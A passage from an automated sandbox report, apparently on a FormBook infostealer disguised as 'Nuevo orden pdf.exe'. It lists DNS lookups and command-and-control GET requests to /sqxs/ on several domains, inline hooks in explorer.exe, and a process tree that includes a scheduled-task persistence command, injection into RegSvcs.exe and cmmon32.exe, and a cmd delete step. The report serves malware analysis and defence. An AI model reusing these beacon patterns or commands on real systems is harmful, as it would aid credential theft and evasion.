                                                    May 4, 2021 20:32:03.073698044 CEST53559848.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:04.074101925 CEST6418553192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:04.125842094 CEST53641858.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:05.436235905 CEST6511053192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:05.485742092 CEST53651108.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:06.437875986 CEST5836153192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:06.487046003 CEST53583618.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:07.462248087 CEST6349253192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:07.515238047 CEST53634928.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:08.652471066 CEST6083153192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:08.701133966 CEST53608318.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:09.570100069 CEST6010053192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:09.623348951 CEST53601008.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:10.825794935 CEST5319553192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:10.876168966 CEST53531958.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:11.954246998 CEST5014153192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:12.005791903 CEST53501418.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:13.437654018 CEST5302353192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:13.486207008 CEST53530238.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:14.739033937 CEST4956353192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:14.790641069 CEST53495638.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:16.254549980 CEST5135253192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:16.306952953 CEST53513528.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:17.547317982 CEST5934953192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:17.596081972 CEST53593498.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:18.649224043 CEST5708453192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:18.698066950 CEST53570848.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:32.163991928 CEST5882353192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:32.235934973 CEST53588238.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:49.475682020 CEST5756853192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:49.526153088 CEST53575688.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:53.355766058 CEST5054053192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:53.416126013 CEST53505408.8.8.8192.168.2.3
                                                    May 4, 2021 20:33:03.694046974 CEST5436653192.168.2.38.8.8.8
                                                    May 4, 2021 20:33:03.752305984 CEST53543668.8.8.8192.168.2.3
                                                    May 4, 2021 20:33:15.336529970 CEST5303453192.168.2.38.8.8.8
                                                    May 4, 2021 20:33:16.000143051 CEST53530348.8.8.8192.168.2.3
                                                    May 4, 2021 20:33:22.251682043 CEST5776253192.168.2.38.8.8.8
                                                    May 4, 2021 20:33:22.322088003 CEST53577628.8.8.8192.168.2.3
                                                    May 4, 2021 20:33:29.678556919 CEST5543553192.168.2.38.8.8.8
                                                    May 4, 2021 20:33:29.739419937 CEST53554358.8.8.8192.168.2.3
                                                    May 4, 2021 20:33:35.713857889 CEST5071353192.168.2.38.8.8.8
                                                    May 4, 2021 20:33:35.781704903 CEST53507138.8.8.8192.168.2.3
                                                    May 4, 2021 20:33:56.504192114 CEST5613253192.168.2.38.8.8.8
                                                    May 4, 2021 20:33:56.570712090 CEST53561328.8.8.8192.168.2.3
                                                    May 4, 2021 20:33:59.694628954 CEST5898753192.168.2.38.8.8.8
                                                    May 4, 2021 20:33:59.745659113 CEST53589878.8.8.8192.168.2.3
                                                    May 4, 2021 20:34:01.708457947 CEST5657953192.168.2.38.8.8.8
                                                    May 4, 2021 20:34:01.773356915 CEST53565798.8.8.8192.168.2.3

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    May 4, 2021 20:33:15.336529970 CEST192.168.2.38.8.8.80x87ddStandard query (0)www.thefuture101.comA (IP address)IN (0x0001)
                                                    May 4, 2021 20:33:35.713857889 CEST192.168.2.38.8.8.80xbb8fStandard query (0)www.mediatraining-toronto.comA (IP address)IN (0x0001)
                                                    May 4, 2021 20:33:56.504192114 CEST192.168.2.38.8.8.80xe34cStandard query (0)www.bluevistainvestments.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    May 4, 2021 20:33:16.000143051 CEST8.8.8.8192.168.2.30x87ddNo error (0)www.thefuture101.comthefuture101.comCNAME (Canonical name)IN (0x0001)
                                                    May 4, 2021 20:33:16.000143051 CEST8.8.8.8192.168.2.30x87ddNo error (0)thefuture101.com178.128.103.114A (IP address)IN (0x0001)
                                                    May 4, 2021 20:33:35.781704903 CEST8.8.8.8192.168.2.30xbb8fNo error (0)www.mediatraining-toronto.commediatraining-toronto.comCNAME (Canonical name)IN (0x0001)
                                                    May 4, 2021 20:33:35.781704903 CEST8.8.8.8192.168.2.30xbb8fNo error (0)mediatraining-toronto.com184.168.131.241A (IP address)IN (0x0001)
                                                    May 4, 2021 20:33:56.570712090 CEST8.8.8.8192.168.2.30xe34cNo error (0)www.bluevistainvestments.combluevistainvestments.comCNAME (Canonical name)IN (0x0001)
                                                    May 4, 2021 20:33:56.570712090 CEST8.8.8.8192.168.2.30xe34cNo error (0)bluevistainvestments.com34.102.136.180A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.thefuture101.com
                                                    • www.mediatraining-toronto.com
                                                    • www.bluevistainvestments.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.349728178.128.103.11480C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 4, 2021 20:33:17.211909056 CEST1372OUTGET /sqxs/?Ef=w0QgkeD38IHRIdpbCIGaty7sV88cqzXhWLmJ40eLjOUR8JRp45mybBQ5KmZt/1kyJcny&ojl0d=RzuhPJ HTTP/1.1
                                                    Host: www.thefuture101.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 4, 2021 20:33:17.513118982 CEST1372INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.16.1
                                                    Date: Tue, 04 May 2021 18:33:17 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Content-Length: 203
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 71 78 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sqxs/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.349735184.168.131.24180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 4, 2021 20:33:35.976903915 CEST5539OUTGET /sqxs/?Ef=GovnwUyBgs6xiYQW/zP+CA3Z06ENiLPJ6FoyDogwOk1ZQfWjapvzV/e42GR+qjeaq8An&ojl0d=RzuhPJ HTTP/1.1
                                                    Host: www.mediatraining-toronto.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 4, 2021 20:33:36.241235971 CEST5540INHTTP/1.1 301 Moved Permanently
                                                    Server: nginx/1.16.1
                                                    Date: Tue, 04 May 2021 18:33:36 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Location: https://www.richardmaxwell.ca/sqxs/?Ef=GovnwUyBgs6xiYQW/zP+CA3Z06ENiLPJ6FoyDogwOk1ZQfWjapvzV/e42GR+qjeaq8An&ojl0d=RzuhPJ
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.34973634.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 4, 2021 20:33:56.613141060 CEST5542OUTGET /sqxs/?Ef=rJ59qlVpBd2p2MzE9PeUClXd0JALEtveJTDdwZJeh/IadIDZ7Pe72xE/unf7IFRjfuAh&ojl0d=RzuhPJ HTTP/1.1
                                                    Host: www.bluevistainvestments.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 4, 2021 20:33:56.750116110 CEST5542INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Tue, 04 May 2021 18:33:56 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "6089be8c-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function NameHook TypeActive in Processes
                                                    PeekMessageAINLINEexplorer.exe
                                                    PeekMessageWINLINEexplorer.exe
                                                    GetMessageWINLINEexplorer.exe
                                                    GetMessageAINLINEexplorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
                                                    Function NameHook TypeNew Data
                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xEA
                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xEA
                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xEA
                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xEA

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: Nuevo orden pdf.exe PID: 5520 Parent PID: 5648

                                                    General

                                                    Start time:20:32:06
                                                    Start date:04/05/2021
                                                    Path:C:\Users\user\Desktop\Nuevo orden pdf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\Nuevo orden pdf.exe'
                                                    Imagebase:0x8c0000
                                                    File size:907776 bytes
                                                    MD5 hash:02A32CC05EFBF5236A8C0928D3C9170E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Analysis Process: schtasks.exe PID: 204 Parent PID: 5520

                                                    General

                                                    Start time:20:32:12
                                                    Start date:04/05/2021
                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp'
                                                    Imagebase:0x1160000
                                                    File size:185856 bytes
                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: conhost.exe PID: 6156 Parent PID: 204

                                                    General

                                                    Start time:20:32:12
                                                    Start date:04/05/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6b2800000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: RegSvcs.exe PID: 6196 Parent PID: 5520

                                                    General

                                                    Start time:20:32:13
                                                    Start date:04/05/2021
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Imagebase:0x470000
                                                    File size:45152 bytes
                                                    MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:high

                                                    Analysis Process: explorer.exe PID: 3388 Parent PID: 6196

                                                    General

                                                    Start time:20:32:15
                                                    Start date:04/05/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff714890000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: cmmon32.exe PID: 6616 Parent PID: 3388

                                                    General

                                                    Start time:20:32:30
                                                    Start date:04/05/2021
                                                    Path:C:\Windows\SysWOW64\cmmon32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                    Imagebase:0x11a0000
                                                    File size:36864 bytes
                                                    MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    Analysis Process: cmd.exe PID: 6776 Parent PID: 6616

                                                    General

                                                    Start time:20:32:35
                                                    Start date:04/05/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                    Imagebase:0x110000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: conhost.exe PID: 6784 Parent PID: 6776

                                                    General

                                                    Start time:20:32:35
                                                    Start date:04/05/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6b2800000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >